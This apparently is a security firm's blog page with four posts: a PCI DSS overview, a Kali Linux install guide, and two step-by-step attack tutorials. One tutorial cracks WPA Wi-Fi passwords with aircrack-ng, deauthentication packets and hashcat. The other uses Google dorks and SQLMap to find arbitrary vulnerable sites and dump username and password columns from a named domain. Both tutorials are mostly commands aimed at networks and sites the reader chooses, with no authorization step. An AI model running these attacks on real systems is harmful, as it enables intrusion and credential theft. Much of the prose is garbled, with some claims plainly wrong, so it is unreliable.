Airzero Sec

We Do Not Give Up ! Trust US !

Ethical Hacking

Ethical hacking involves an authorized attempt to gain unauthorized access to a computer system, application, or data. Carrying out an ethical hack involves duplicating strategies and actions of malicious attackers.

enter image description here

The payment card industry data security standard is a set of needs to be intended to ensure that all organizations that process, store, or transmit credit card information maintain a secure surrounding. An independent body created by Visa, MasterCard, American Express, Discover, and JCB, administers and manages the PCI DSS. Interestingly, the payment brands and acquirers are responsible for strengthening compliance, rather than the PCI SSC.

An Overview Of PCI SSC Data Security Standards

In an effort to enhance payment card data security, the PCI Security Standards Council provides comprehensive standards and support things, which include frameworks, tools, measurements, and support resources to help companies ensure the security of cardholder information at all times. The PCI DSS is the cornerstone of the council, as it provides the necessary framework for developing a complete card data security process that encompasses prevention, detection, and is the appropriate action to security incidents.

What are the Tools Available from PCI SSC?

  • Self-Assessment Questionnaires to assist companies in validating their PCI DSS compliance.
  • PIN Transaction Security needs for device vendors and manufacturers and a list of consented PIN transaction devices.
  • Payment Application Data Security Standard and a list of Payment Applications to help software technologies and others develop safe payment applications.
  • Public resources: * Lists of Qualified Security Assessors. * Payment Application Qualified Security Assessors. * Approved Scanning Vendors * Internal Security Assessor education program

What Are The 12 Requirements For PCI DSS Compliance?

  • USE AND MAINTAIN FIREWALLS:
    Firewalls essentially remove access to foreign entities attempting to access personal data. These prevention systems are often the first line of defence against attackers. Firewalls are needed for PCI DSS compliance because of their effectiveness in preventing unwanted access.
  • PROPER PASSWORD PROTECTIONS: <br.Routers and other third-party things often come with generic passwords and safe measures simply accessed by the public. Too often, businesses fail to save these vulnerabilities. Ensuring compliance in these places includes keeping a list of all devices and software which require a password. In addition to a device inventory, common precautions and configurations should also be enacted.
  • PROTECT CARDHOLDER DATA:
    The third need of PCI DSS compliance is the two-fold firewall of cardholder data. Card Data must be encrypted with some important algorithms. These encryptions are put into place with an encryption key which is also needed to be encrypted for compliance. Regular check and scanning of primary account numbers are needed to ensure unencrypted data exists.
  • ENCRYPT TRANSMITTED DATA:
    Cardholder data is sent across a number of different ordinary channels. This data must be encrypted whenever it is sent to these known areas. Account numbers should also never be transferred to areas that are unknown.
  • USE AND MAINTAIN ANTI-VIRUS:
    Enabling anti-virus software is a great practice outside of PCI DSS compliance. However, anti-virus software is required for all machines that interact with and store PAN. This software should be regularly checked and updated. Your POS provider should also employ anti-virus measures where it cannot be directly enabled.
  • PROPERLY UPDATED SOFTWARE:
    Firewalls and anti-virus software will need to be updated often. It is also a good idea to update every piece of software in a business. Most software technologies will add security measures, such as patches to address recently identified vulnerabilities, in their updates, which add another level of security. These updates are especially required for all software on devices that communicate with store cardholder data.
  • RESTRICT DATA ACCESS:
    Cardholder data is required to be important “need to know.” All staff, executives, and third parties who do not need access to these details should not have it. The roles that do need sensitive data should be well-documented and updated regularly as required by PCI DSS.
  • UNIQUE IDS FOR ACCESS:
    Persons who do have access to cardholder data should have personal credentials and identification for access. For instance, there should not be a simple login to the encrypted data with multiple employees knowing the username and password. Unique IDs create less vulnerability and a faster response time in the event data is compromised.
  • RESTRICT PHYSICAL ACCESS:
    Any cardholder data must be physically kept in a safe area. Both data that is physically written and data that is digitally kept should be locked in a safe room, drawer, or cabinet. Not only should access be boarded, but anytime the private data is accessed, it should be kept in a log to remain compliant.
  • CREATE AND MAINTAIN ACCESS LOGS:
    All activities dealing with cardholder details and primary account numbers require a log entry. Perhaps the most common non-compliance issue is not efficient record-keeping and data when it comes to accessing private data. Compliance needs to document how details flow into your institution and the number of times access is required. Software products to log access are also required to ensure accuracy.
  • SCAN AND TEST FOR VULNERABILITIES:
    All ten of the previous compliance involve several software products, physical locations, and likely a few employees. There are many needs that can malfunction, go out of date, or suffer from manual error. These problems can be placed by fulfilling the PCI DSS needed for regular scans and vulnerability testing.
  • DOCUMENT POLICIES:
    Inventory of equipment and software that have access will need to be spotted for compliance. The logs of enabling cardholder data will also need documentation. How details flow into your company, where it is kept, and how it is used after the point of sale will also all need to be data.
  • BENEFITS OF PCI COMPLIANCE
    Complying with PCI Security Standards seems like a daunting plan, at the very least. The maze of standards and issues seems like a lot to handle for large companies, let alone little companies. Yet, compliance is becoming more important and may not be as troublesome as you assume, especially if you have the right options.
  • DIFFICULTIES POSED BY PCI NON-COMPLIANCE
    PCI SSC also points to potentially disastrous results of failing to meet PCI Compliance. After working to build your brand and secure customers, don’t take an option with their sensitive details. By meeting PCI Compliance, you are protecting your clients so they can continue to be yours. Possible results of PCI Non-Compliance include:
  • Compromised data that negatively impacts consumers, merchants, and financial institutions.
  • Severely damaging your reputation and your ability to conduct business effectively, not just today, but into the future.
  • Account data breaches can lead to catastrophic loss of sales, relationships, and community standing; plus, public companies often see depressed share prices as a result of account data breaches.
  • Lawsuits, insurance claims, cancelled accounts, payment card issuer fines, and government fines.
    PCI Compliance, as with other regulations needs, can pose challenges to organizations that are not prepared to deal with protecting crucial details. But, protecting data is a much more manageable task with the right software and services. Choose a data loss prevention software that accurately classifies data and uses it appropriately so you can rest more easily knowing that your cardholder data is safe.

If you have any doubts about the above topic or have to get services and consultations against every serious cyber problem. Feel free to contact us. AIRZERO SEC will be your strong cyber partner. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What is Aircrack-ng?

Aircrack-ng is a Wi-Fi safety auditing tool specifically 802.11 WEP. It is also used for cracking the WEP and WPA keys for getting access to a network. Aircrack-ng is used by learning persons and safety professionals to test the safety, reliability of wireless networks.

What are the steps to hack wifi?

  • The first step is to open your Kali Linux terminal
  • The second step is to enter the Aircrack-Ng command
  • The next step is to enter the password
  • The next important step is to install Aircrack-ng
  • Ok then, Turn on Airmon-ng
  • Next is to find the monitor name
  • The next step is to start monitoring the network
  • Next is to enable a monitor mode interface
  • Next to kill any processes that return errors
  • Next is to review the monitor interface name
  • Next is to tell your computer to listen to nearby routers
  • Next is to find the router that you want to hack
  • Make sure the router is using WPA security
  • Next is you have to note the MAC address and channel number of the routers
  • The next step is to monitor your selected networks for a handshake
  • The next step is you have to wait for a handshake to appear
  • Next is to exit airodump-ng, Then open the desktop
  • Next is to Rename your “.cap” file
  • Covert the “.cap” file into “.hccapx” format
  • Installnaive-hash cat
  • Run naive-hashcat
  • Next is to wait for the network password to be cracked

How to Open your Kali Linux computer's Terminal?

Find and click the Terminal app, which resembles a black box with a white symbol on it. You can also just click keypress+Alt+Ctrl+T to open the Terminal.

How to Enter the Aircrack-ng installation command?

Type in the below command, then press keypress+Enter sudo apt-get install aircrack-ng

How to Enter your password when prompted?

Type in the password you use to log into your computer, then press keypress+Enter. This includes root access for any other commands run in the Terminal. If you open another Terminal window, you may have to run a command with the prefix and/or enter your password again.

How to install Aircrack-ng?

Press keypress+Y when prompted, then wait for the program to finish installing.

How to Turn on Airmon-ng?

Type in the following command, then press keypress+Enter.

airmon-ng

How to Find the monitor name?

You'll find this in the user Interface column. If you're hacking the network that you own, it will usually be named "wlan0". If you don't see a name, your Wi-Fi card doesn't support it.

How to Begin monitoring the network?

.You can do so by typing in the below command and pressing keypress+Enter airmon-ng start wlan0

Make sure you change "wlan0" with the name of your aimed network if it is variant.

How to Enable a monitor mode interface?

Enter the following command iwconfig

How to Kill any processes that return errors?

In some situations, the Wi-Fi card will conflict with services on your computer. You can kill these processes by typing the following command airmon-ng check kill

How to Review the monitor interface name?

In majority situations, the name will be something like "mon0" or "wlan0mon".

How to Tell your computer to listen to nearby routers?

To get a list of routers, enter the following command: airodump-ng mon0

Make sure to change "mon0" with whatever your monitor interface name was in the last step.

How to identify the router you want to hack?

At the end of each string, you'll see a name, find the one belonging to the network you want to hack into. How to Make sure the router is using WPA or WPA2 security?

If you see "WPA" or "WPA2" immediately to the left of the network's name, you can proceed, otherwise, you cannot hack the network.

How to Note the MAC address and channel number of the router?

This collection of information is to the left of the network's name ''MAC address'' — This is the line of numbers on the far-left side of your router's line. ''Channel'' — This is the number directly to the left of the WPA or WPA2 tag.

How to Monitor your selected network for a handshake?

A handshake was happening when an item connects to a network. Enter the below code, making sure to replace the suggested components of the command with your network's information airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Replace "channel" with the number that you found in the last step. Replace "MAC" with the address you found in the last step. Remember to replace "mon0" with whatever your interface name was. Here's an example address: airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon

How to Wait for a handshake to appear?

Once you see a line with the tag "WPA handshake:" followed by a MAC address in the upper-right corner of the screen, you can proceed. If you're not in a waiting mood, you can, before continuing with this part.

How to Exit airodump-ng, then open the desktop?

Press keypress+Ctrl+C to quit, then make sure you can see the ".cap" file on your computer's desktop.

How to Rename your '''".cap" file.''?

While not strictly necessary, this will make it easier to work with later. Enter the below command to change the name, making sure to replace "name" with whatever you want to name the file: mv ./-01.cap name.cap

If your ".cap" file isn't named "-01.cap", replace "-01.cap" with whatever your ".cap" file's name is.

How to Convert the '''".cap" file into ".hccapx" format.'''?

You can do this by using a converter. Enter the below command, making sure to replace "name" with the file's name: cap2hccapx.bin name. cap name.hccapx

upload the ".cap" file to the converter by clicking '''Choose File''' and selecting your file. Once the file is uploaded, click '''Convert''' and then download it back onto your desktop before proceeding.

How to Install naive-hashcat?

This is the way you'll use to crack the password. Enter the following commands in order: sudo git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat curl -L -o dicts/rockyou.txt
https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

If your computer doesn't have a GPU, you'll need to use Aircrack-ng instead.

How to Run naive-hashcat?

Once it finishes, enter the below command: HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh

How to Wait for the network password to be cracked?

Once the password is hacked, its string will be added to the "name. pot" file found in the "naive-hashcat", the word after the last colon in the string is the password. It can take anywhere from a bit hours to a few months for the password to be hacked.

How do we use Aircrack-Ng for Non-GPU computers?

  • First, you have to download a directory file
  • Second has to tell aircrack-ng to begin cracking the password.
  • Last Step you have to wait for the terminal to display the result.

How to Download a dictionary file?

The most used dictionary file is "Rock You". You can download it by typing the below command: curl -L -o rockyou.txt Remember that aircrack-ng will not be able to crack the WPA or WPA2 password if the password isn't in the word list.

How to Tell Aircrack-ng to begin cracking the password?

Enter the following command, making sure to use the necessary network information when doing so: `aircrack-ng -a2 -b MAC -w rockyou.txt name.cap If you're cracking a WPA network instead of a WPA2 network, replace "-a2".

Replace "MAC" with the address you identify in the last section. Replace "name" with your ".cap" file's name.

How to Wait for Terminal to display the results?

When you see a "KEY FOUND!" appears, Aircrack-ng has found the password. You'll see the password in brackets to the right of the "KEY FOUND!".

How do we use a deauth attack to force a handshake?

  • The first is to understand what a deauth attack does
  • The second step is to monitor your network
  • Next is to wait for something to connect to the network
  • Open a new terminal window
  • Next is to send the deauth packets
  • Last is to Re-open the original terminal window

How to Understand what a deauth attack does?

Deauth attacks send malicious de-authentication packets to the router you're trying to break into, causing the Internet to disconnect and ask the Internet user to log back in. Once the user logs back in, you will be provided with a handshake.

How to Monitor your network?

Enter the below command, making sure to enter your network's information where it suggested’ airodump-ng -c channel --bssid MAC

For example: airodump-ng -c 1 --bssid 9C:5C:8E:C9:AB:C0

How do we Wait for something to connect to the network?

Once you see two MAC addresses appear next to each other, you can proceed. This indicates that a client is now connected to the network.

How to Open a new Terminal window?

You can just press keypress+Alt+Ctrl+T to do this. Make sure airodump-ng is still running in the background.

How do Send the deauth packets?

Enter the below command, making sure to change your network's information: aireplay-ng -0 2 -a MAC1 -c MAC2 mon0

The number refers to the number of packets to send. You can change this number, but keep in mind that sending more than two packets can cause a noticeable security breach. Replace "MAC1" with the address at the bottom of the background Terminal window. Replace "MAC2" with the address at the bottom of the background Terminal window. Remember to change "mon0" with your name that you found when your computer initially looked for routers. An example command looks like this:

aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

How to Re-open the original Terminal window?

Go back to the Terminal window when you're done sending the packets.

Look for a handshake. Once you see the "WPA handshake: "the address next to it.

If you have any queries about the above topic or have to get services and consultations against every serious cyber threat. Feel free to contact us. AIR ZERO SEC will be your strong cyber partner. E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The individuals that use databases for various data storage management greatly increase in web app development as time moves on. The database facilitates communication between users and servers. The database gives different benefits including data input and where it is kept, retrieval of large information and the ease of grouping information.

This is both exciting and worrying because in a database there are a lot of important details like credential accounts, financial details and so on. Also, to do SQL injection attacks does not always need an expert injecting capability, in the sense, even kids can do it. Because there are many applications that are useful to perform SQL injection automatically, such as SQLMap. SQLMap is an application for penetration testing activities that aims to conduct SQL injection attacks in database security automatically. Here in this blog, we will show you how to do SQL injection using SQLMap. No special requirements are needed but will be worth more if you master a scripting language. This blog is suggested for those who are new to SQL injection, or who want to see how SQL injection works.

What Is SQL Injection?

SQL injection is specially referred to as SQLi, maybe it’s a most common attack method that uses inappropriate code for back-end database changes to access details that weren't intended to be displayed and are highly mentioned to be highly secret.

How does SQL injection work?

To run a SQL injection, an attacker must locate a weak input in a web application or webpage. When an application or web page includes an SQL injection vulnerability, it uses user input in the form of an SQL query. The attacker can execute a specifically build SQL command as a malicious cyber threat. Then, leveraging this code the attacker can acquire a response that provides a clear direction about the database construction and thereby access to all the information in the database.

How do we do SQL injection using SQLmap in Kali Linux?

  • The first step is to install sqliv on Kali Linux
  • The next step is finding SQL injection vulnerabilities
  • The last and final step is SQL injection using SQL map

How to install sqlive on Kali Linux?

Type following command into your terminal to install SQLiv:

~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i

After SQLiv is installed in your Kali Linux, it is kept in the path /usr/bin/sqliv. Which, you can call from the terminal, by typing ‘sqliv’.

How do we find SQL injection vulnerabilities?

We will always use Google Dorking to scan and identify the SQL injection in targets. Let’s take a simple dork, and let SQLiv scan through each target and look for an eCommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork list”.

~# sqliv -d inurl:item.php?id= -e google -p 100

By default, SQLiv will crawl the f page on a search, which on google sites per page. Thus, here we define argument -p 100 to crawl through 100 sites.

How do we do SQL injection using SQLmap?

Once we got at least one SQL injection vulnerable point, next we run the attack using SQLMap. Firstly, we are required to reveal the database name, the database has tables and columns, Those that contain the data. Steps to follow:

  • The first step is to enumerate the database names
  • The next step is to enumerate the table’s name
  • The third step is to enumerate columns
  • Last step is to dump data

How to enumerate the database names:

Command pattern:

~# sqlmap -u “TARGET URL” --dbs
-u / --url : Target URL
--dbs : Enumerate Database/s name

So, for example, the command would look like this:

`~# sqlmap -u “http://www.acfurniture.com/item.php?id=25” --dbs`

How to enumerate tables name:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name --tables

So, For example, the command compiled be like this:

~# sqlmap -u " the link that you try to inject" -D acfurniture --tables

How to enumerate column names:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name --columns

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings--columns

How do we dump data?

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns --dump

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump

Or you can also delete all data inside the table, By using the command that gives us an example instead of the given url you should choose the url that you want to do SQL injection:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump

If you have any queries about the above topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner.

E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

How To Install Kali Linux?

- Posted in Ethical Hacking by

enter image description here

A suitable operating system helps you in performing time-consuming and tedious tasks efficiently. Currently, There is a numberless Linux-based Operating system but installing kali-Linux is arguably one of the best options. It is used by cybersecurity professionals for penetration testing, ethical hacking, and network security assessments. In this blog, we will take a look at how to install Kali Linux.

What is Kali Linux?

Kali Linux is the leading Linux distribution in penetration testing, ethical hacking, and security auditing.

When it will be penetration testing, hacking and Linux distributions, one of the best things to be mentioned is Kali Linux. The software comes firstly packaged with a variety of different command-line hacking tools geared towards various detailed safety tasks. Such as Penetration Testing, Computer Forensics, and application security. commonly, Kali Linux is the best operating system for ethical hackers and is broadly recognized in all parts of the world.

What is Kali Linux used for?

Kali Linux is mainly used for Penetration Testing and mainly in Security Auditing. Kali contains various tools that are geared to the various information security tasks, such as Penetration Testing, Computer Forensics and Reverse Engineering.

How to install Kali Linux?

Kali Linux installation is a super easy process and you have multiple installation options. The most preferred ones include:

  1. Installing Kali Linux by building a Kali bootable USB drive
  2. Hard disk installs in Kali Linux
  3. Using virtualization software
  4. Both booting Kali Linux with the operating system

While you have different options to choose from, in this blog, we will look at how to install Kali Linux using virtualization. Below are the stated steps, you can create your machine with all the options you need to perform a comprehensive penetration test.

What Are The Installation Requirements?

  • Minimum 20 GB of space in your hard drive
  • At least 4 GB of ram is recommended when using VMware
  • CD-DVD Drive or USB support

Getting run with Installation.

Need To Install Vmware:

In order to run Kali Linux on your system, we will need some piece of virtualization software first. There are many options to select from, such as Oracle’s VirtualBox. Once the installation is completed, release VMware from your applications folder.

Needed to install Kali Linux and check its image integrity

To access Kali Linux you can go through its official page and click the one that best suits your needs from there. It is included on the download page, you will identify a bunch of numbers. Kali Linux is intended to be used for safety-related tasks. So, you need to check the identity of the image you download.

Needed to launch a new virtual machine

On the VMware Workshop homepage, click on create a virtual machine, choose the Kali Linux iso file, select the guest operating system and configure virtual machine details. Start the virtual machine by selecting the Kali Linux VM, and then clicking on the Power On button.

What is the installation procedure?

  • Step 1:
    Once the system is powered up, you will be prompted to pick your preferred installation mode in the GRUB menu. Click graphical install and continue.
  • Step 2:
    The next couple of screens will ask you to select locale details such as your constant language, your area location and keyboard layout.
  • Step 3:
    Once through the local details, the loader will default by installing some additional things and configuring your network-related settings. Then the individual will prompt for a hostname and domain for this installation. Provide unused information for the environment and continue installing.
  • Step 4:
    Set a password for your Kali Linux and click continue. DOn’t EVER FORGET THIS PASSWORD.
  • Step 5:
    After the password is confirmed, the installer will encourage you to set the time zone and then stop at the disk partitioning. It will provide you with four choices about the partitions of the disk. The simplest option for you is to use ‘Guided – Use Entire Disk’. old users can use the “Manual” partitioning option for more granular options.
  • Step 6:
    Select the partitioning disk & then click on continue.
  • Step 7:
    Make sure that all changes are to be made to the disk on the host system. Be super aware that if you continue it will erase data on the disk.
  • Step 8:
    Once sufficient files are installed, the system will ask you if you want to set up a network mirror to obtain future pieces of software and updates. Make sure to enable these work tools if you wish to use Kali packages.
  • Step 9:
    Next, you will be enquired to install the GRUB boot. Select ‘Yes’ and click the machine to write the needed boot loader details to the hard drive which is needed to boot Kali.
  • Step 10:
    Once the installer completes installing GRUB to the disk, click on continue to complete the installation, it will install some final stage files.

If you have any queries about this topic or have to get services and digital forensic and penetration testing services. Feel free to contact us. AIRZERO SEC will be your strong firewall. E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/